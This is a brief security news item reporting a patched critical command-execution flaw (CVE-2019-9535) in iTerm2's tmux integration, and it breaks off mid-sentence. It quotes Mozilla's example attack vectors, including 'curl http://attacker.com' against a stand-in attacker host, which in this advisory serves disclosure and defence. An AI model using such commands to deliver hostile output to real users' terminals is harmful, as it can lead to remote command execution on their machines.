Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! - Help Net Security

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system.



“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained.


“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”


About the vulnerability (CVE-2019-9535)


The vulnerability is in the tmux integration feature of iTerm2 and has been present for at least seven years.


It was dis ..
